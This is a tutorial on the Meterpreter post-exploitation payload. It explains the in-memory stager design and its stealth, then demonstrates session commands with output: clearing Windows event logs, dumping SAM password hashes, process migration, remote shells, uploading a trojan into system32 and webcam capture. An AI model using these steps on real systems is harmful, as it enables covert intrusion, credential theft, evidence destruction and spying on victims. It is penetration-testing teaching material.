Meterpreter
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime.
It communicates over the stager socket and provides a comprehensive client-side Ruby API.
How Meterpreter Works
The target executes the initial stager. This is usually one of bind, reverse, findtag, passivex, etc.
The stager loads the DLL prefixed with Reflective. The Reflective stub handles the loading/injection of the DLL.
The Metepreter core initializes, establishes a TLS/1.0 link over the socket and sends a GET. Metasploit receives this GET and configures the client.
Lastly, Meterpreter loads extensions. It will always load stdapi and will load priv if the module gives administrative rights. All of these extensions are loaded over TLS/1.0 using a TLV protocol.
Meterpreter Design Goals
Stealthy
Meterpreter resides entirely in memory and writes nothing to disk.
No new processes are created as Meterpreter injects itself into the compromised process and can migrate to other running processes easily.
By default, Meterpreter uses encrypted communications.
All of these provide limited forensic evidence and impact on the victim machine.
Powerful
Meterpreter utilizes a channelized communication system.
The TLV protocol has few limitations.
Extensible
New features can be added to Meterpreter without having to rebuild it.
Features can be augmented at runtime by loading extensions over the network.
The client uploads the DLL over the socket.
The server running on the victim loads the DLL in-memory and initializes it.
The new extension registers itself with the server.
The client on the attackers machine loads the local extension API and can now call the extensions functions.
Meterpreter Basic Commands
Help
meterpreter > help
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
channel Displays information about active channels
...snip...
Background
The background command will send the current Meterpreter session to the background and return you to the ‘msf’ prompt.
meterpreter > background
msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
Cat
The cat command displays the content of a file.
meterpreter > cat edit.txt
What you talkin' about Willis
CD and PWD
The cd and pwd commands are used to change and display current working directory on the target host.
meterpreter > pwd
c:\
meterpreter > cd c:\windows
meterpreter > pwd
c:\windows
LCD and LPWD
The lcd and lpwd commands are used to change and display the local working directory respectively.
Changing the working directory will give your Meterpreter session access to files located in this folder.
meterpreter > lpwd
/root
meterpreter > lcd MSFU
meterpreter > lpwd
/root/MSFU
ClearEV
The clearev command will clear the Application, System, and Security logs on a Windows system.
There are no options or arguments.

meterpreter > clearev
[*] Wiping 97 records from Application...
[*] Wiping 415 records from System...
[*] Wiping 0 records from Security...
meterpreter >

Download
The download command downloads a file from the remote machine.
meterpreter > download c:\\boot.ini
[*] downloading: c:\boot.ini -> c:\boot.ini
[*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
Edit
The edit command opens a file located on the target host.
It uses the ‘vim’ so all the editor’s commands are available.
meterpreter > edit edit.txt
Execute
The execute command runs a command on the target.
meterpreter > execute -f cmd.exe -i -H
Process 38320 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
GetUID
Running getuid will display the user that the Meterpreter server is running as on the host.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Hashdump
The hashdump post module will dump the contents of the SAM database, where user and group account information stored.
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::
victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
meterpreter >
IdleTime
Running idletime will display the number of seconds that the user at the remote machine has been idle.
meterpreter > idletime
User has been idle for: 5 hours 26 mins 35 secs
IPConfig
The ipconfig command displays the network interfaces and addresses on the remote machine.
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:10:f5:15
IP Address : 192.168.1.104
Netmask : 255.255.0.0
LS
The ls command will list the files in the current remote directory.
Migrate
Using the migrate post module, you can migrate to another process on the victim.
meterpreter > run post/windows/manage/migrate
[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)
meterpreter >
PS
The ps command displays a list of running processes on the target.
meterpreter > ps
Process list
============
PID Name Path
--- ---- ----
132 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe
152 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe
288 snmp.exe C:\WINDOWS\System32\snmp.exe
...snip...
Resource
Run Meterpreter instructions located inside a text file.
By default, the commands will run in the current working directory (on target machine) and resource file in the local working directory (the attacking machine).
root@kali:~# cat resource.txt
ls
background
meterpreter > resource resource.txt
[*] Reading /root/resource.txt
[*] Running ls
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2012-02-29 16:41:29 -0500 .
40777/rwxrwxrwx 0 dir 2012-02-02 12:24:40 -0500 ..
100666/rw-rw-rw- 606 fil 2012-02-15 17:37:48 -0500 IDA Pro Free.lnk
100777/rwxrwxrwx 681984 fil 2012-02-02 15:09:18 -0500 Sc303.exe
100666/rw-rw-rw- 608 fil 2012-02-28 19:18:34 -0500 Shortcut to Ability Server.lnk
100666/rw-rw-rw- 522 fil 2012-02-02 12:33:38 -0500 XAMPP Control Panel.lnk
[*] Running background
[*] Backgrounding session 1...
msf exploit(handler) >
Search
The search commands provides a way of searching specific files through the whole system or specific folders on the target host.
meterpreter > search -f autoexec.bat
Found 1 result...
c:\AUTOEXEC.BAT
meterpreter > search -f sea*.bat c:\\xamp\\
Found 1 result...
c:\\xampp\perl\bin\search.bat (57035 bytes)
meterpreter >
Shell
The shell command will present you with a standard shell on the target system.
meterpreter > shell
Process 39640 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
Upload
The upload command uploads a file to the remote machine.
meterpreter > upload evil_trojan.exe c:\\windows\\system32
[*] uploading : evil_trojan.exe -> c:\windows\system32
[*] uploaded : evil_trojan.exe -> c:\windows\system32\evil_trojan.exe
WebCam_List
The webcam_list command will display currently available web cams on the target host.
meterpreter > webcam_list
1: Creative WebCam NX Pro
2: Creative WebCam NX Pro (VFW)
WebCam_Snap
The webcam_snap command grabs a picture from a connected web cam on the target system, and saves it to disc as a JPEG image.
By default, the save location is the local current working directory with a randomized filename.
meterpreter > webcam_snap -h
Usage: webcam_snap [options]
Grab a frame from the specified webcam.
OPTIONS:
-h Displays the help information for the command
-i If more then 1 web cam is connected, use this option to select the device to capture the image from
-p Change path and filename of the image to be saved
-q The imagine quality, 50 being the default/medium setting, 100 being best quality
-v Automatically view the JPEG image (Default: 'true')
meterpreter > webcam_snap -i 1 -v false
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/Offsec/YxdhwpeQ.jpeg
Python Extension
Meterpreter’s python extension gives users the ability to run Python code natively on a target machine, without having the interpreter installed.
References
Last updated